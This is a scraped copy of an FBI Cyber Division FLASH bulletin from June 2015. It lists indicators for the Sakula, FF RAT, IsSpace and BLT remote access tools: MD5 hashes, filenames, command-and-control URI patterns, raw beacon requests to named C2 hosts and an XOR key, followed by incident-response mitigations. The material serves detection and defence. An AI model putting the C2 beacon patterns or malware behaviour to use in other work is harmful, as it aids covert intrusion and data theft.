Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
 
Final Project – Incident Response Exercise SAMPLE.docx
Final Project – Incident Response Exercise SAMPLE.docxFinal Project – Incident Response Exercise SAMPLE.docx
Final Project – Incident Response Exercise SAMPLE.docx
 
Firewall
FirewallFirewall
Firewall
 
IDS+Honeypots Making Security Simple
IDS+Honeypots Making Security SimpleIDS+Honeypots Making Security Simple
IDS+Honeypots Making Security Simple
 

Fbi cyber division bulletin on tools reportedly used by opm hackers

  • 1. TLP: GREEN The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607 TLP: GREEN 05 June 2015 Alert Number A-000061-MW Please contact the FBI with any questions related to this FLASH Report at either your local Cyber Task Force or FBI CYWATCH. Email: cywatch@ic.fbi.gov Phone: 1-855-292-3937 Local Field Offices: www.fbi.gov/contact-us/field In furtherance of public-private partnerships, the FBI routinely advises private industry of various cyber threat indicators observed during the course of our investigations. This data is provided in order to help cyber security professionals and system administrators to guard against the persistent malicious actions of cyber criminals. This FLASH has been released TLP: GREEN: The information in this product is useful for the awareness of all participating organizations as well as with peers within the broader community or sector. Recipients may share this information with peers and partner organizations within their sector or community, but not via publicly accessible channels. Summary The FBI is providing the following information with HIGH confidence: The FBI has obtained information regarding cyber actors who have compromised and stolen sensitive business information and Personally Identifiable Information (PII). Information obtained from victims indicates that PII was a priority target. The FBI notes that stolen PII has been used in other instances to target or otherwise facilitate various malicious activities such as financial fraud though the FBI is not aware of such activity by these groups. Any activity related to these groups detected on a network should be considered an indication of a compromise requiring extensive mitigation and contact with law enforcement. Technical Details The FBI is providing the following information with HIGH confidence: Groups responsible for these activities have been observed across a variety of intrusions leveraging a diverse selection of tools and techniques to attempt to gain initial access to a victim including using credentials acquired during previous intrusions. These groups have also been observed compromising using the technique of DNS hijacking facilitated through the compromise of DNS registrars.
  • 2. TLP: GREEN Federal Bureau of Investigation, Cyber Division FLASH NOTIFICATION The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607 TLP: GREEN Following such an exploit, such groups have been observed recently using custom Remote Access Tools (RAT). Sakula- A RAT that has the capabilities to launch remote command shells, enumerate processes, download files, and beacon to Command and Control (C2) domains. Sakula attempts to send a two-beacon set over TCP port 80 to a configured domain. If the domain is unavailable, it will attempt to connect to a secondary domain over TCP port 80 and 443 using HTTP. Specific Sakula MD5 hash values are attached in the accompanying Excel spreadsheet. Beaconing POST /script.asp?imageid=ivpgvz2085205250&type=0&resid=93863828&nmsg=up HTTP/1.1 Accept: */* User-Agent: iexplorer Host: [varies] Content-Length: 173 Cache-Control: no-cache GET /photo/ivpgvz2085205250.jpg?resid=93864218 HTTP/1.1 User-Agent: iexplorer Host: [varies] Cache-Control: no-cache The following are example POST and GET requests to the secondary C2 domain GET /newimage.asp?imageid= POST /view.asp?cstring= POST /view.asp?cstring=%s&tom=0&id= POST /script.asp?imageid= GET /photo/%s.jpg?id=%d POST /viewpre.asp?cstring= User-Agent: HttpDump 1.1 POST /script.asp?imageid=ivpgvz2085205250&type=0&resid=100391156&nmsg=up HTTP/1.1 Accept: */* User-Agent: iexplorer Host: [varies] Content-Length: 173 Cache-Control: no-cache GET /photo/ivpgvz2085205250.jpg?resid=100391156 HTTP/1.1 User-Agent: iexplorer Host: [varies]
  • 3. TLP: GREEN Federal Bureau of Investigation, Cyber Division FLASH NOTIFICATION The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607 TLP: GREEN FF RAT- a RAT that has the capabilities to download Trojan DLL files to memory and beacon back to C2 domains and was named based on the unique string “FF-RAT USER” found within the malware. The data sent in the beacon is XOR- encoded using the key 0x27. Trojan.IsSpace - a RAT that contains multiple files that include a dropper (EWSNH.exe), Trojan (AOFVPMJXVT.exe), privilege escalation tool (SensrSvc2013.exe), and a module used by the tool (SensrSvc2013.dll). This malware is capable of bypassing dyndns categorization by using a proxy through Google AppProxy’s hosted on appspot domains. Filename: EWSNH.exe MD5: bfdbf09072b58e90aef726c2d1ecf8b7 File Size (bytes): 1990136 Filename: AOFVPMJXVT.exe MD5: 25631f5ccec8f155a8760b8568ca22c5 File Size (bytes): 63488 Filename: SensrSvc2013.exe MD5: 38f29e955b76de69c8e97f4491202b8b File Size (bytes): 197120 Filename: <VARIES>.tmp / SensrSvc2013.dll / CRYPTBASE.dll MD5: 75416711fc782a3e2a2b54c4b86677bf File Size (bytes): 42496 Protocol variations in the URI: SSports.asp? HostID= SWeather.asp? HostID= &PackNo= SJobs.asp?HostID= STravel.asp?HostID= SGames.asp? HostID= SNews.asp?HostID= STTip.asp Trojan.BLT- a RAT that is executed from its export CreateInstance, the mutex HFRM_ is created and a process instance of cmd.exe is launched to execute the command “ipconfig/all” to collect the victim system’s MAC address. Trojan.BLT will test network connectivity by establishing a connection with a legitimate website. This malware is capable of bypassing dyndns categorization by using a proxy through Google AppProxy’s hosted on appspot domains. Trojan.BLT will validate the connection by checking the HTTP header “Service:IIS”. Trojan.BLT will then conduct further C2 activity.
  • 4. TLP: GREEN Federal Bureau of Investigation, Cyber Division FLASH NOTIFICATION The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607 TLP: GREEN Beaconing: POST /fetch.py HTTP/1.1 Accept: */* Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: snecma-secure.appspot.com Content-Length: 56 Connection: Close POST /asp/STTip.asp HTTP/1.1 Accept: */* Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: facebook.from-pr.com Content-Length: 11 Connection: Close GET / HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1) Host: www.microsoft.com Cache-Control: no-cache Recommended Mitigations The FBI is providing the following information with HIGH confidence: The FBI and NSA recommend the following mitigation measures be taken within the first 72 hours of detection: Prepare Your Environment for Incident Response • Establish Out-of-Band Communications methods for dissemination of intrusion response plans and activities, inform NOCs/CERTs according to institutional policy and SOPs ensuring that all devices have logging enabled and their logs are being aggregated to those centralized solutions • Disable all remote (including RDP & VPN) access until a password change has been completed • Implement full SSL/TLS inspection capability (on perimeter and proxy devices) • Monitor accounts and devices determined to be part of the compromise to prevent reacquisition attempts Implement core mitigations to inhibit re-exploitation (within 72 hours) Implement a network-wide password reset (preferably with local host access only, no remote changes allowed) to include:
  • 5. TLP: GREEN Federal Bureau of Investigation, Cyber Division FLASH NOTIFICATION The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607 TLP: GREEN • All domain accounts (especially high-privileged administrators) • Local Accounts • Machine and System Accounts Patch all systems for critical vulnerabilities: A patch management process that regularly patches vulnerable software remains a critical component in raising the difficulty of intrusions for cyber operators. While a few adversaries use zero-day exploits to target victims, many adversaries still target known vulnerabilities for which patches have been released, capitalizing on slow patch processes and risk decisions by network owners not to patch certain vulnerabilities or systems. After initial response activities, deploy and correctly configure Microsoft's Enhanced Mitigation Experience Toolkit (EMET). EMET employs several mitigations techniques to combat memory corruption techniques. It is recommended that all hosts and servers on the network implement EMET, but for recommendations on the best methodology to employ when deploying EMET, please see NSA/IAD's Anti-Exploitation Slicksheet - https://www.nsa.gov/ia/_files/factsheets/I43V_Slick_Sheets/Slicksheet_AntiExploitationFeatures_Web.pdf Implement Data-At-Rest (DAR) Protections.  The goal for DAR protections is to prevent an attacker from compromising sensitive data when the End User Device (EUD) is powered off or unauthenticated.  The use of multiple encryption layers that meet IAD and CNSSP-15 guidance, implemented with components meeting the Commercial Solution for Classified (CSfC) vendor diversity requirements, reduces the likelihood that a single vulnerability or failure can be exploited to compromise EUDs, move laterally through a network, and access sensitive data.  Receiving and validating updates or code patches for these components only through direct physical administration or an NSA approved Data in Transit (DIT) solution mitigates the threat of malicious attempts to push unverified updates or code updates.  Procure products that have been validated through NIAP’s DAR Protection Profiles (PPs) and utilize the DAR Capability Package (CP) that provides configurations allowing customers to independently implement secure solutions using layered Commercial Off-the-Shelf (COTS) products. The CP is vendor-agnostic and provides high-level security and configuration guidance for customers and/or Solution Integrators. Implement long-term mitigations to further harden systems 1. Protect Credentials: By implementing the following credential protections, the threat actor’s ability to gain highly privileged account access and move throughout a network is severely hampered. a. Implement Least Privilege: Least privilege is the limiting of rights assigned to each group of accounts on a network to only the rights required for the user, as in a normal user is only granted user level privileges and cannot perform any administrative tasks such as installing software. b. Restrict Local Accounts: By restricting the usage of local accounts, especially local administer accounts, you are able to reduce the amount of usable credentials found within a network. When utilizing local accounts, passwords and their corresponding hashes are stored on the host and are
  • 6. TLP: GREEN Federal Bureau of Investigation, Cyber Division FLASH NOTIFICATION The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607 TLP: GREEN more readily available for harvesting by an adversary who seeks to establish persistence. Adversaries are known to use this information to move across the network through Pass the Hash. c. Limit lateral movement: This mitigation reduces the adversary’s ability to go from exploiting one machine to taking over the entire network. Host firewall rules, Active Directory structuring, and/or Group Policy settings, can be tailored to stop communications between systems and increase the survivability and defensibility of a network under attack. d. Admin Access Segregation: Once an adversary gains administrator credentials, especially domain administrator credentials, the network becomes wide open to their malicious activity. By decreasing the surface area where admin credentials can be stolen, through restricting where administrators can use their accounts and what they can use their accounts for, the threat actor will have a much harder time fully compromising a network. e. Log and Monitor Privileged Admin Account Usage: Implementing logging and monitoring capabilities on privileged accounts can provide insight to system owners and incident response professionals of account misuse and potential compromise by malicious actors. For instance it may be discovered that a domain admin is logging in at 2200 every night even though that admin is done working for the day and gone from the building. This mitigation would also enable discovery of any privileged admin accounts that were created by the actor for persistence. 2. Segregate Networks and Functions: a. DMZ Isolation: By ensuring that the DMZ is properly segregated both through physical and logical network architecture and admin/user accounts, a network owner can greatly decrease the external attack surface. Since webservers and corresponding databases usually sit in this location and are also externally accessible, they regularly are the first target during CNO. If these systems are compromised and the DMZ is not configured properly or at all, it could mean the loss of the entire enterprise. b. Network Function Segregation: A network owner should implement a tiered system when determining the switching within a network. This way the lower security systems, like user workstations or machines with email and internet access, cannot insecurely communicate with higher security systems like domain controllers and other member servers. This can be achieved through multiple methods including VLANs, physical network topologies, and Firewall rule sets. In the same vein, networks need to apply the same segregation principle to the various tiers of accounts within a network, ensuring highly privileged accounts cannot access lower security tiered systems and low privilege accounts cannot access higher security tiered systems. c. Perimeter Filtering: Perimeter filtering refers to properly implementing network security devices, such as proxies, firewall, web content filters, and IDS/IPS. The intent is to block malicious traffic from reaching a user’s machine and provide protection against data exfiltration and command and control. 3. Implement Application Whitelisting: Application whitelisting is the configuring of host system to only execute a specific, known set of code. Basically, if a program or executable code, such as a piece of malware, is not included in the whitelist it’s never allowed to run. 4. Install and correctly use EMET: One of the frequently used tactics by an adversary is to initially infect a host through spear-phishing and drive-by’s/water-holing websites. The best way to counter this initial exploitation is through the implementation of an anti-exploitation tool, such as Microsoft’s Enhanced Mitigation Experience Toolkit (EMET). These tools can render useless entire classes of malware and malicious TTP instead of eliminating one piece of malware at a time; an enormous boon to a network’s security.
  • 7. TLP: GREEN Federal Bureau of Investigation, Cyber Division FLASH NOTIFICATION The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607 TLP: GREEN 5. Use a Standard Baseline: Implementing a uniform image with security already baked in and standardized applications affords the incident response team the ability to look at exploited machines and distinguish what is malicious vs. allowed. It also ensures that each machine on network is at least at a certain level of security prior to further customization for a user’s needs. Within the DoDIN this can be satisfied through the Unified Master Gold Disk, maintained and distributed through DISA. 6. Centralize logging of all events: By pulling all of the system logs, such as Windows Event or Error logs, and any logs from security devices, such as SNORT or firewall rule hits, into a centralized location, the network admin and intrusion response team would be able to more efficiently detect and understand the tools, tactics, and procedures of the adversary. Using this information then increases the responder’s ability to effectively corner and expel the adversary. 7. Data-at-Rest and Data-in-Transit Encryption: Implementing encryption for both data at rest and data in transit ensures that what is meant to be kept private stays private, whether it is stored on a disk or moving across a network. It means that exfiltration and espionage attempts can be thwarted since a threat actor cannot access the information. Additional guidance to follow can be found at the following: Implement Pass-the-Hash mitigations. For more information, please see the NSA/IAD Publication Reducing the Effectiveness of Pass-the-Hash at - http://www.nsa.gov/ia/_files/app/Reducing_the_Effectiveness_of_Pass-the- Hash.pdf Baseline File Systems and Accounts in preparation for Whitelisting implementation. Consider using a Secure Host Baseline. See NSA/IAD's guidance at https://www.nsa.gov/ia/_files/factsheets/I43V_Slick_Sheets/Slicksheet_SecureHostBaseline_Print.pdf Deploy, configure and monitor Application Whitelisting. For detailed guidance, please see NSA/IAD's Application Whitelisting Slicksheet at – https://www.nsa.gov/ia/_files/factsheets/i43v_slick_sheets/slicksheet_applicationwhitelisting_standard.pdf POINT OF CONTACT - In furtherance of public-private partnerships, the FBI routinely advises private industry of various cyber threat indicators observed during the course of our investigations. This data is provided in order to help cyber security professionals and system administrators to guard against the persistent malicious actions of cyber criminals. - The FBI encourages recipients who identify the use of tool(s) or techniques discussed in this document to report information to their local FBI field office or the FBI’s 24/7 Cyber Watch. Field office contacts can be identified at www.fbi.gov/contact-us/field. CyWatch can be contacted by phone at 855-292-3937 or by e- mail at cywatch@ic.fbi.gov. - Press inquiries should be directed to the FBI’s National Press Office at npo@ic.fbi.gov or 202-324-3691.